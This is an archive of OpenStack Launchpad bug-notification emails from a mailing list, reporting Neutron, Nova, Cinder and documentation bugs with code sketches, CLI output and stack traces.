[Yahoo-eng-team] [Bug 1486861] [NEW] get_extensions_path fails to remove a duplicate path when the path gets appended with another path

2015-08-20 Thread Ryu Ishimoto
Public bug reported:

get_extensions_path contains logic to eliminate duplicated paths.
However, when the 'api_extensions_path' config option contains multiple
colon-concatenated paths, it treats the whole concatenated list as a
single extension path.

This can be a problem for Neutron services, specifically fwaas, lbaas
and vpnaas, whose extension paths are added automatically in
get_extensions_path.  If the fwaas extension path is also specified in
'CONF.api_extensions_path', for example, and that value is appended
with a different extension path, the duplicated fwaas extension paths
are not recognized as duplicates.

In an offending case, you would have:

paths = ['fw_ext_path', 'fw_ext_path:some_other_path']

and since 'fw_ext_path' != 'fw_ext_path:some_other_path', both
'fw_ext_path' entries remain. This causes an error later on when the
Firewall object's 'super' is called, because the module containing the
Firewall class definition was loaded twice (which Python does not
tolerate).

In the above scenario, the paths should have been evaluated as:

paths = ['fw_ext_path', 'fw_ext_path', 'some_other_path']
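
For illustration, the de-duplication needs to split the colon-separated
config value before comparing entries. A minimal sketch (the function
and variable names here are assumptions for illustration, not the
actual Neutron code):

def get_extensions_path(conf_value, service_paths):
    # conf_value: the raw CONF.api_extensions_path string,
    #             e.g. 'fw_ext_path:some_other_path'
    # service_paths: paths added automatically for fwaas/lbaas/vpnaas
    paths = list(service_paths)
    # Split the config value so each element is a single path.
    paths.extend(p for p in conf_value.split(':') if p)
    # Order-preserving de-duplication.
    seen = set()
    unique = [p for p in paths if not (p in seen or seen.add(p))]
    return ':'.join(unique)

# get_extensions_path('fw_ext_path:some_other_path', ['fw_ext_path'])
# then yields 'fw_ext_path:some_other_path' with no duplicate.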

** Affects: neutron
 Importance: Undecided
 Status: New

** Description changed:

  get_extensions_path contains logic to eliminate duplicated paths.
  However, in the case where the 'api_extensions_path' of config contains
  multiple concatenated paths, it treats the concatenated list as one
  extension path.
  
  This could be a problem for Neutron services, specifically fwaas, lbaas
  and vpnaas.  For these, their extension paths are automatically added in
  get_extensions_paths.  If fwaas extension path is also specified in
  CONF.api_extensions_path', for example, and if that path is appended
  with a different extension path, the duplicated fwaas extension paths
  are not recognized as duplicate.
  
  In an offending case, you would have:
  
- paths = ['fw_ext_path', 'fw_ext_path:some_other_path']
+ paths = ['fw_ext_path', 'fw_ext_path:some_other_path']
  
  and since 'fw_ext_path' != 'fw_ext_path:some_other_path', both
  'fw_ext_path' remains, which causes error later on when Firewall
  object's 'super' is called since the module containing the Firewall
  class definition of Firewall was loaded twice (python doesn't like
  this).
  
  In the above scenario, the paths should have been evaluated as:
  
- paths = ['fw_ext_path', 'fw_ext_path', 'some_other_path']
+ paths = ['fw_ext_path', 'fw_ext_path', 'some_other_path']

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1486861

Title:
  get_extensions_path fails to remove a duplicate path when the path
  gets appended with another path

Status in neutron:
  New

Bug description:
  get_extensions_path contains logic to eliminate duplicated paths.
  However, when the 'api_extensions_path' config option contains
  multiple colon-concatenated paths, it treats the whole concatenated
  list as a single extension path.

  This can be a problem for Neutron services, specifically fwaas,
  lbaas and vpnaas, whose extension paths are added automatically in
  get_extensions_path.  If the fwaas extension path is also specified
  in 'CONF.api_extensions_path', for example, and that value is
  appended with a different extension path, the duplicated fwaas
  extension paths are not recognized as duplicates.

  In an offending case, you would have:

  paths = ['fw_ext_path', 'fw_ext_path:some_other_path']

  and since 'fw_ext_path' != 'fw_ext_path:some_other_path', both
  'fw_ext_path' entries remain. This causes an error later on when the
  Firewall object's 'super' is called, because the module containing
  the Firewall class definition was loaded twice (which Python does not
  tolerate).

  In the above scenario, the paths should have been evaluated as:

  paths = ['fw_ext_path', 'fw_ext_path', 'some_other_path']

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1486861/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1486864] [NEW] When I test cinder volume display_name's boundary value, the error message is not clear

2015-08-20 Thread chenying
Public bug reported:

When I test the cinder volume display_name's boundary value, the error
message is not clear.

The error message describes it as a server error (HTTP 500). From the
message we cannot tell that the overly long name caused the error.

Should the message describe the error more clearly? Do we need to add
some detail to the error messages?
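
For illustration, a validation of roughly this shape would turn the
failure into a clear client error; the function name and the 255
character limit are assumptions, not the actual Cinder code:

import webob.exc

MAX_DISPLAY_NAME_LEN = 255  # assumed DB column limit

def validate_display_name(name):
    # Reject over-long names up front with a readable 400 instead of
    # letting the DB layer blow up into an HTTP 500.
    if name is not None and len(name) > MAX_DISPLAY_NAME_LEN:
        raise webob.exc.HTTPBadRequest(
            explanation="display_name exceeds the %d character limit"
                        % MAX_DISPLAY_NAME_LEN)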


stack@openstack3-T3200:~$ cinder list
+--------------------------------------+-----------+--------------+------+-------------+----------+-------------+
|                  ID                  |   Status  | Display Name | Size | Volume Type | Bootable | Attached to |
+--------------------------------------+-----------+--------------+------+-------------+----------+-------------+
| cc251b54-8706-4f89-bde5-d484f4393e76 | available |              |  1   |      -      |  false   |             |
+--------------------------------------+-----------+--------------+------+-------------+----------+-------------+
stack@openstack3-T3200:~$ ^C
stack@openstack3-T3200:~$ ^C
stack@openstack3-T3200:~$ ^C
stack@openstack3-T3200:~$ ^C
stack@openstack3-T3200:~$ ^C
stack@openstack3-T3200:~$ ^C
stack@openstack3-T3200:~$ ^C
stack@openstack3-T3200:~$ cinder rename  cc251b54-8706-4f89-bde5-d484f4393e76 

 
1
 
11
ERROR: The server has either erred or is incapable of performing the requested 
operation. (HTTP 500) (Request-ID: req-9bf9190d-e335-4b28-a926-47a95a38f954)
stack@openstack3-T3200:~$ ^C
stack@openstack3-T3200:~$

** Affects: glance
 Importance: Undecided
 Status: New


** Tags: error messages

** Attachment added: "cinder-api.log"
   
https://bugs.launchpad.net/bugs/1486864/+attachment/4449209/+files/cinder-api.log

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/1486864

Title:
  When I test cinder volume display_name's boundary value, the error
  message

[Yahoo-eng-team] [Bug 1486425] Re: misspelling in the documentation “Compute API v2 (SUPPORTED)”

2015-08-20 Thread cai xiaoxiao
** Project changed: nova => openstack-api-site

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1486425

Title:
  misspelling in the documentation “Compute API v2 (SUPPORTED)”

Status in openstack-api-site:
  Invalid

Bug description:
  http://developer.openstack.org/api-ref-compute-v2.html #1.4.5. Update
  server

   There is a misspelling in the Description of  Request parameter
  “auto_disk_config (Optional)” .

   Now:
   Defines how the server's root disk partition is handled when the server 
is started or resized. Valid value are:

   Change the text as follows:
  Defines how the server's root disk partition is handled when the server 
is started or resized. Valid values are:

To manage notifications about this bug go to:
https://bugs.launchpad.net/openstack-api-site/+bug/1486425/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1486880] [NEW] Can't delete an instance if boot from encryption volume

2015-08-20 Thread Eli Qiao
Public bug reported:

nova configuration:

[ephemeral_storage_encryption]
enabled = True
cipher = aes-xts-plain64
key_size = 512

[default]
# use lvm as images_type
images_type=lvm
# use that volume group
# /opt/stack/data/stack-volumes-default-backing-file
images_volume_group=stack-volumes-default

reproduce:

root@taget-ThinkStation-P300:/opt/stack/nova# nova boot --security-groups default --key-name testkey --image 57b26b8f-0e8c-4ffd-87b9-0177e6331b29 --nic net-id=e1d6382e-0e01-4172-9772-19d83058f8f3 --flavor 1 test3

root@taget-ThinkStation-P300:/opt/stack/nova# nova delete test3

root@taget-ThinkStation-P300:/opt/stack/nova# nova list
+--------------------------------------+-------+--------+------------+-------------+----------+
| ID                                   | Name  | Status | Task State | Power State | Networks |
+--------------------------------------+-------+--------+------------+-------------+----------+
| 9ac19e94-06e0-42c9-bbb5-aff44a70959e | test1 | ERROR  | deleting   | NOSTATE     |          |
| 6b8c201c-6e83-4eed-a12e-190e2fa9c1a5 | test2 | ERROR  | deleting   | NOSTATE     |          |
| d58b12ca-f983-47b8-93d8-a570fe4458d0 | test3 | ERROR  | -          | Shutdown    |          |
+--------------------------------------+-------+--------+------------+-------------+----------+


2015-08-20 15:52:22.113 ERROR oslo_messaging.rpc.dispatcher 
[req-5a58977e-04d6-47d4-b962-a98601d400d6 admin admin] Exception during message 
handling: Failed to remove volume(s): (Unexpected error while running command.
Command: sudo nova-rootwrap /etc/nova/rootwrap.conf lvremove -f 
/dev/stack-volumes-default/d58b12ca-f983-47b8-93d8-a570fe4458d0_disk
Exit code: 5
Stdout: u''
Stderr: u'  WARNING: Ignoring duplicate config node: global_filter (seeking 
global_filter)\n  WARNING: Ignoring duplicate config node: global_filter 
(seeking global_filter)\n  Logical volume 
stack-volumes-default/d58b12ca-f983-47b8-93d8-a570fe4458d0_disk is used by 
another device.\n')
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher Traceback (most 
recent call last):
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher   File 
"/usr/local/lib/python2.7/dist-packages/oslo_messaging/rpc/dispatcher.py", line 
142, in _dispatch_and_reply
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher 
executor_callback))
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher   File 
"/usr/local/lib/python2.7/dist-packages/oslo_messaging/rpc/dispatcher.py", line 
186, in _dispatch
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher 
executor_callback)
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher   File 
"/usr/local/lib/python2.7/dist-packages/oslo_messaging/rpc/dispatcher.py", line 
129, in _do_dispatch
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher result = 
func(ctxt, **new_args)
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher   File 
"/opt/stack/nova/nova/exception.py", line 89, in wrapped
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher payload)
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher   File 
"/usr/local/lib/python2.7/dist-packages/oslo_utils/excutils.py", line 119, in 
__exit__
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher 
six.reraise(self.type_, self.value, self.tb)
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher   File 
"/opt/stack/nova/nova/exception.py", line 72, in wrapped
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher return f(self, 
context, *args, **kw)
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher   File 
"/opt/stack/nova/nova/compute/manager.py", line 345, in decorated_function
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher 
LOG.warning(msg, e, instance_uuid=instance_uuid)
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher   File 
"/usr/local/lib/python2.7/dist-packages/oslo_utils/excutils.py", line 119, in 
__exit__
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher 
six.reraise(self.type_, self.value, self.tb)
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher   File 
"/opt/stack/nova/nova/compute/manager.py", line 316, in decorated_function

** Affects: nova
 Importance: High
 Assignee: Eli

[Yahoo-eng-team] [Bug 1486882] [NEW] ml2 port cross backends extension

2015-08-20 Thread Dong Liu
Public bug reported:

In some Neutron deployments there is more than one ML2 backend, for
example openvswitch plus an SDN controller. Ports in the same network
may then be served by different ML2 backends. For an openvswitch
backend, the tunneling IP of a port is the same as the ovs-agent
host's IP. But for an SDN controller backend there is no l2-agent, so
the tunneling IP of a port cannot be derived from the host
configuration. So I think we need to add a new ML2 port attribute to
record the tunnel connection info for ports. Maybe we can name it
"binding:tunnel_connection".

In the current implementation we get the tunneling IP of a port this
way: port -> binding:host -> agent -> agent configurations ->
tunneling_ip.  With this extension we could get the tunneling IP more
simply: port -> binding:tunnel_connection -> tunneling_ip.

Proposed Change (a possible shape of the attribute is sketched below):
* add an extension attribute on port, named "binding:tunnel_connection"
* add a field to the ports table
* a small change in the create/update port flow, maybe in
openvswitch_ml2_driver and l2pop_driver
* maybe add some policy rules
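
A hypothetical shape of the attribute definition (the defaults and
policy flags are illustrative only, not an agreed-upon API):

TUNNEL_CONNECTION = 'binding:tunnel_connection'

EXTENDED_ATTRIBUTES_2_0 = {
    'ports': {
        TUNNEL_CONNECTION: {
            'allow_post': True,
            'allow_put': True,
            'default': None,
            'enforce_policy': True,
            'is_visible': True,
        },
    },
}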

** Affects: neutron
 Importance: Undecided
 Assignee: Dong Liu (liudong78)
 Status: New


** Tags: rfe

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1486882

Title:
  ml2 port cross backends extension

Status in neutron:
  New

Bug description:
  In some Neutron deployments there is more than one ML2 backend, for
  example openvswitch plus an SDN controller. Ports in the same network
  may then be served by different ML2 backends. For an openvswitch
  backend, the tunneling IP of a port is the same as the ovs-agent
  host's IP. But for an SDN controller backend there is no l2-agent, so
  the tunneling IP of a port cannot be derived from the host
  configuration. So I think we need to add a new ML2 port attribute to
  record the tunnel connection info for ports. Maybe we can name it
  "binding:tunnel_connection".

  In the current implementation we get the tunneling IP of a port this
  way: port -> binding:host -> agent -> agent configurations ->
  tunneling_ip.  With this extension we could get the tunneling IP more
  simply: port -> binding:tunnel_connection -> tunneling_ip.

  Proposed Change:
  * add an extension attribute on port, named "binding:tunnel_connection"
  * add a field to the ports table
  * a small change in the create/update port flow, maybe in
  openvswitch_ml2_driver and l2pop_driver
  * maybe add some policy rules

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1486882/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1437904] Re: generate_sample.sh uses MODULEPATH environment variable, conflicts with environment-modules

2015-08-20 Thread Lucas Alvares Gomes
** Also affects: ironic
   Importance: Undecided
   Status: New

** Changed in: ironic
 Assignee: (unassigned) => Lucas Alvares Gomes (lucasagomes)

** Changed in: ironic
   Importance: Undecided => Low

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1437904

Title:
  generate_sample.sh uses MODULEPATH environment variable, conflicts
  with environment-modules

Status in Cinder:
  In Progress
Status in Ironic:
  In Progress
Status in OpenStack Compute (nova):
  Fix Released

Bug description:
  The generate_sample.sh script refers to a MODULEPATH variable without
  clearing it first.  On a system using the environment-modules package,
  MODULEPATH is a PATH-like environment variable, which leads
  generate_sample.sh to fail like this:

  No module named
  
/etc/scl/modulefiles:/etc/scl/modulefiles:/usr/share/Modules/modulefiles:/etc/modulefiles:/usr/share/modulefiles

  The solution is to either explicitly clear this variable at the start
  of the script, or use a different name if this is something that is
  expected to be set externally.

To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/1437904/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1486936] [NEW] Migration scripts and db models are not in sync

2015-08-20 Thread Jakub Libosvar
Public bug reported:

Alembic used to not compare foreign keys correctly, which let the
migration scripts and the db models drift out of sync. With the new
alembic version that fixes that bug [1], we are going to start failing
in Neutron.
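
For context, a models-vs-migrations check of this kind boils down to
running alembic's compare_metadata against the model metadata; a
minimal sketch (the connection URL is a placeholder and the model_base
import is an assumption, not the exact Neutron test code):

from alembic.autogenerate import compare_metadata
from alembic.migration import MigrationContext
from sqlalchemy import create_engine

from neutron.db import model_base

engine = create_engine('mysql+pymysql://user:secret@localhost/neutron')
ctx = MigrationContext.configure(engine.connect())

# A non-empty diff (e.g. 'remove_fk'/'add_fk' entries) means the models
# and the migration scripts disagree.
diff = compare_metadata(ctx, model_base.BASEV2.metadata)
assert not diff, "Models and migration scripts aren't in sync:\n%s" % diff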

Captured traceback:
~~~
Traceback (most recent call last):
  File "neutron/tests/functional/db/test_migrations.py", line 166, in 
test_models_sync
self.fail("Models and migration scripts aren't in sync:\n%s" % msg)
  File 
"/opt/stack/neutron/.tox/functional/lib/python2.7/site-packages/unittest2/case.py",
 line 690, in fail
raise self.failureException(msg)
AssertionError: Models and migration scripts aren't in sync:
[ ( 'remove_fk',
ForeignKeyConstraint(, None, name=u'csnat_l3_agent_bindings_ibfk_3', 
ondelete=u'CASCADE', table=Table('csnat_l3_agent_bindings', 
MetaData(bind=None), Column('router_id', VARCHAR(length=36), 
ForeignKey(u'routers.id'), ForeignKey(u'routers.id'), 
table=, primary_key=True, nullable=False), 
Column('l3_agent_id', VARCHAR(length=36), ForeignKey(u'agents.id'), 
ForeignKey(u'agents.id'), table=, primary_key=True, 
nullable=False), Column('host_id', VARCHAR(length=255), 
table=), Column('csnat_gw_port_id', 
VARCHAR(length=36), ForeignKey(u'ports.id'), ForeignKey(u'ports.id'), 
table=), schema=None))),
  ( 'add_fk',
ForeignKeyConstraint(, None, table=Table('csnat_l3_agent_bindings', 
MetaData(bind=None), Column('router_id', String(length=36), 
ForeignKey('routers.id'), table=, primary_key=True, 
nullable=False), Column('l3_agent_id', String(length=36), 
ForeignKey('agents.id'), table=, primary_key=True, 
nullable=False), Column('host_id', String(length=255), 
table=), Column('csnat_gw_port_id', String(length=36), 
ForeignKey('ports.id'), table=), schema=None))),
  ( 'remove_fk',
ForeignKeyConstraint(, None, name=u'flavorserviceprofilebindings_ibfk_1', 
table=Table('flavorserviceprofilebindings', MetaData(bind=None), 
Column('service_profile_id', VARCHAR(length=36), 
ForeignKey(u'serviceprofiles.id'), ForeignKey(u'serviceprofiles.id'), 
table=, primary_key=True, nullable=False), 
Column('flavor_id', VARCHAR(length=36), ForeignKey(u'flavors.id'), 
ForeignKey(u'flavors.id'), table=, 
primary_key=True, nullable=False), schema=None))),
  ( 'remove_fk',
ForeignKeyConstraint(, None, name=u'flavorserviceprofilebindings_ibfk_2', 
table=Table('flavorserviceprofilebindings', MetaData(bind=None), 
Column('service_profile_id', VARCHAR(length=36), 
ForeignKey(u'serviceprofiles.id'), ForeignKey(u'serviceprofiles.id'), 
table=, primary_key=True, nullable=False), 
Column('flavor_id', VARCHAR(length=36), ForeignKey(u'flavors.id'), 
ForeignKey(u'flavors.id'), table=, 
primary_key=True, nullable=False), schema=None))),
  ( 'add_fk',
ForeignKeyConstraint(, None, ondelete='CASCADE', 
table=Table('flavorserviceprofilebindings', MetaData(bind=None), 
Column('flavor_id', String(length=36), ForeignKey('flavors.id'), 
table=, primary_key=True, nullable=False), 
Column('service_profile_id', String(length=36), 
ForeignKey('serviceprofiles.id'), table=, 
primary_key=True, nullable=False), schema=None))),
  ( 'add_fk',
ForeignKeyConstraint(, None, ondelete='CASCADE', 
table=Table('flavorserviceprofilebindings', MetaData(bind=None), 
Column('flavor_id', String(length=36), ForeignKey('flavors.id'), 
table=, primary_key=True, nullable=False), 
Column('service_profile_id', String(length=36), 
ForeignKey('serviceprofiles.id'), table=, 
primary_key=True, nullable=False), schema=None))),
  ( 'remove_fk',
ForeignKeyConstraint(, None, name=u'qos_bandwidth_limit_rules_ibfk_1', 
ondelete=u'CASCADE', table=Table('qos_bandwidth_limit_rules', 
MetaData(bind=None), Column('id', VARCHAR(length=36), 
table=, primary_key=True, nullable=False), 
Column('qos_policy_id', VARCHAR(length=36), ForeignKey(u'qos_policies.id'), 
ForeignKey(u'qos_policies.id'), table=, 
nullable=False), Column('max_kbps', INTEGER(display_width=11), 
table=), Column('max_burst_kbps', 
INTEGER(display_width=11), table=), schema=None))),
  ( 'add_fk',
ForeignKeyConstraint(, None, table=Table('qos_bandwidth_limit_rules', 
MetaData(bind=None), Column('id', String(length=36), 
table=, primary_key=True, nullable=False, 
default=ColumnDefault( at 0x7f42aa72b1b8>)), 
Column('qos_policy_id', String(length=36), ForeignKey('qos_policies.id'), 
table=, nullable=False), Column('max_kbps', 
Integer(), table=), Column('max_burst_kbps', 
Integer(), table=), schema=None))),
  ( 'remove_fk',
ForeignKeyConstraint(, None, name=u'subnetpoolprefixes_ibfk_1', ondelete=u'CASCADE', 
table=Table('subnetpoolprefixes', MetaData(bind=None), Column('cidr', 
VARCHAR(length=64), table=, primary_key=True, 
nullable=False), Column('subnetpool_id', VARCHAR(length=36), 
ForeignKey(u'subnetpools.id'), ForeignKey(u'subnetpools.id'), 
table=, primary_key=True, nullable=False), schema=None))),
  ( 'add_fk',
ForeignKeyConstra

[Yahoo-eng-team] [Bug 1486077] Re: VPNAAS: dsvm-functional doesn't have installed database backends

2015-08-20 Thread Ann Kamyshnikova
** Changed in: neutron
   Status: Confirmed => Invalid

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1486077

Title:
  VPNAAS: dsvm-functional doesn't have installed database backends

Status in neutron:
  Invalid

Bug description:
  During the work on implementing ModelMigrationsSyncTest for vpnaas it
  came up that dsvm-functional in gate does not have mysql and
  postgresql backends installed -
  http://paste.openstack.org/show/420551/.

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1486077/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1476591] Re: volume in_use after VM has terminated

2015-08-20 Thread AMRITANSHU
It's not a bug as I see it: once you have an OpenStack environment
working properly, you can create a VM and attach a volume, but when you
are deleting the VM you must detach the volume first and then delete
the VM.

When you delete the VM, the root volume will be deleted as designed,
but the attached volume will not be detached, because you had not
detached it.

You have to manually detach it from the Volumes tab by going to that
volume.

** Changed in: nova
 Assignee: (unassigned) => AMRITANSHU (amritgeo)

** Changed in: nova
   Status: New => Opinion

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1476591

Title:
  volume in_use after VM has terminated

Status in Cinder:
  New
Status in OpenStack Compute (nova):
  Opinion

Bug description:
  Running the Tempest test
  
tempest.scenario.test_volume_boot_pattern.TestVolumeBootPatternV2.test_volume_boot_pattern
  with our CI system runs into a timing issue in the interaction between
  Nova and Cinder.

  Essentially, on the Cinder side the status of the volume used in the
  test is 'in_use' for several seconds _after_ the test's VM has
  already been terminated and cleaned up, including the unmounting of
  the given volume on the Nova side. As Cinder sees the volume is still
  'in_use' it calls the Nova API to perform the snapshot deletion, but
  since the volume has already been unmounted on the Nova side the
  resulting qemu-img operation triggered by Nova runs into a 'no such
  file or directory' error.

  The following log excerpts show this issue. Please refer to the given
  time stamps (all components run in a devstack in the same machine so
  times should be comparable):

  1) Cinder log (please note i added two debug lines printing the volume status 
data in this snippet that are not part of the upstream driver):
  2015-07-21 08:14:10.163 DEBUG cinder.volume.drivers.remotefs 
[req-6dae7608-e1f4-43af-ac8e-22d6aa7d72c9 
tempest-TestVolumeBootPatternV2-966547300] Deleting snapshot 
ca09f072-c736-41ac-b6f3-7a137b0ee072: _delete_s
  napshot /opt/stack/cinder/cinder/volume/drivers/remotefs.py:915
  2015-07-21 08:14:10.164 DEBUG cinder.volume.drivers.remotefs 
[req-6dae7608-e1f4-43af-ac8e-22d6aa7d72c9 
tempest-TestVolumeBootPatternV2-966547300] Initial snapshot deletion volume 
status is in-use _delete_snapsho
  t /opt/stack/cinder/cinder/volume/drivers/remotefs.py:918
  2015-07-21 08:14:10.420 DEBUG cinder.volume.drivers.remotefs 
[req-6dae7608-e1f4-43af-ac8e-22d6aa7d72c9 
tempest-TestVolumeBootPatternV2-966547300] snapshot_file for this snap is: 
volume-7f4a5711-9f2c-4aa7-a6af-c6
  ccf476702d.ca09f072-c736-41ac-b6f3-7a137b0ee072 _delete_snapshot 
/opt/stack/cinder/cinder/volume/drivers/remotefs.py:941
  2015-07-21 08:14:10.420 DEBUG oslo_concurrency.processutils 
[req-6dae7608-e1f4-43af-ac8e-22d6aa7d72c9 
tempest-TestVolumeBootPatternV2-966547300] Running cmd (subprocess): sudo 
cinder-rootwrap /etc/cinder/rootwra
  p.conf env LC_ALL=C qemu-img info 
/opt/stack/data/cinder/mnt/38effaab97f9ee27ecb78121f511fa07/volume-7f4a5711-9f2c-4aa7-a6af-c6ccf476702d.ca09f072-c736-41ac-b6f3-7a137b0ee072
 execute /usr/local/lib/python2.7/dis
  t-packages/oslo_concurrency/processutils.py:230
  2015-07-21 08:14:11.549 DEBUG oslo_concurrency.processutils 
[req-6dae7608-e1f4-43af-ac8e-22d6aa7d72c9 
tempest-TestVolumeBootPatternV2-966547300] CMD "sudo cinder-rootwrap 
/etc/cinder/rootwrap.conf env LC_ALL=C q
  emu-img info 
/opt/stack/data/cinder/mnt/38effaab97f9ee27ecb78121f511fa07/volume-7f4a5711-9f2c-4aa7-a6af-c6ccf476702d.ca09f072-c736-41ac-b6f3-7a137b0ee072"
 returned: 0 in 1.129s execute /usr/local/lib/python2.7/d
  ist-packages/oslo_concurrency/processutils.py:260
  2015-07-21 08:14:11.700 DEBUG cinder.volume.drivers.remotefs 
[req-6dae7608-e1f4-43af-ac8e-22d6aa7d72c9 
tempest-TestVolumeBootPatternV2-966547300] In delete_snapshot, volume status is 
in-use _delete_snapshot /opt
  /stack/cinder/cinder/volume/drivers/remotefs.py:956

  2) Nova log:
  2015-07-21 08:14:05.153 INFO nova.compute.manager 
[req-e9bea12a-88ef-4f08-a320-d6e8e3b21228 
tempest-TestVolumeBootPatternV2-1465284168 
tempest-TestVolumeBootPatternV2-966547300] [instance: adbe1fa4-7136-4d29-91d
  0-5772dbf4900d] Terminating instance  
  2015-07-21 08:14:05.167 6183 INFO nova.virt.libvirt.driver [-] [instance: 
adbe1fa4-7136-4d29-91d0-5772dbf4900d] Instance destroyed successfully.  
  2015-07-21 08:14:05.167 DEBUG nova.virt.libvirt.vif 
[req-e9bea12a-88ef-4f08-a320-d6e8e3b21228 
tempest-TestVolumeBootPatternV2-1465284168 
tempest-TestVolumeBootPatternV2-966547300] vif_type=bridge instance=Instan
  
ce(access_ip_v4=None,access_ip_v6=None,architecture=None,auto_disk_config=False,availability_zone=None,cell_name=None,cleaned=False,config_drive='True',created_at=2015-07-21T08:13:32Z,default_ephemeral_device=No
  
ne,default_swap_device=None,deleted=False,deleted_at=None,disable_terminate=False,displ

[Yahoo-eng-team] [Bug 1486805] Re: mistake in the documentation

2015-08-20 Thread venkatamahesh
** Project changed: nova => openstack-api-site

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1486805

Title:
  mistake in the documentation

Status in openstack-api-site:
  New

Bug description:
  1. http://developer.openstack.org/api-ref-compute-v2.html #1.4.5.
  Update server

   There is a mistake in the Description of Request parameter
  “auto_disk_config (Optional)” .

   Now:
   True. The root partition expands to encompass all available virtual disk.

   Change the text as follows:
  True. The root partition expands to encompass all available virtual disks.

  we can refer to the other places in the documentation :
     Lists information for all available flavors.
     Lists all available software deployments.

  2. http://developer.openstack.org/api-ref-compute-v2.html#deleteServer
   There is a mistake in the Asynchronous postconditions.

   Now:
   The server is deleted from the list of servers returned by an API calls.

   Change the text as follows:
  The server is deleted from the list of servers returned by an API call.

  it should be [call] not [calls] here.

To manage notifications about this bug go to:
https://bugs.launchpad.net/openstack-api-site/+bug/1486805/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1476591] Re: volume in_use after VM has terminated

2015-08-20 Thread Silvan Kaiser
Hi Amritanshu!
I'm answering the questions from the top down.

Q: Please specify the openstack setup procedure and release used for this 
deployment
A: I used a clean VM (Ubuntu Trusty) with a devstack setup. The Cinder storage 
uses the Quobyte driver and the corresponding storage system (which is running 
on a different machine). On this setup I ran the Tempest volume tests.
If you require specific files from the setup please tell.

Q: Please specify the steps so that we can reproduce it and work on the same.
A: The reproduction might require a Quobyte installation; currently I do not 
have a working alternative setup, but creating one should be possible. The 
issue arises in general Cinder & Nova code during Tempest test cleanup, and 
the Quobyte driver simply calls Cinder/Nova-libvirt functions.

Q: You have to manually detach it by the voulmes tab by going to that volume.
A: The process does not involve manual steps, as this is an automated test 
from the Tempest test suite. If you find there's a detach operation missing, 
maybe that needs to go in somewhere (we would have to find out / clarify 
where exactly).

** Changed in: nova
   Status: Opinion => New

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1476591

Title:
  volume in_use after VM has terminated

Status in Cinder:
  New
Status in OpenStack Compute (nova):
  New

Bug description:
  Running the Tempest test
  
tempest.scenario.test_volume_boot_pattern.TestVolumeBootPatternV2.test_volume_boot_pattern
  with our CI system runs into a timing issue in the interaction between
  Nova and Cinder.

  Essentially, on the Cinder side the status of the volume used in the
  test is 'in_use' for several seconds _after_ the test's VM has
  already been terminated and cleaned up, including the unmounting of
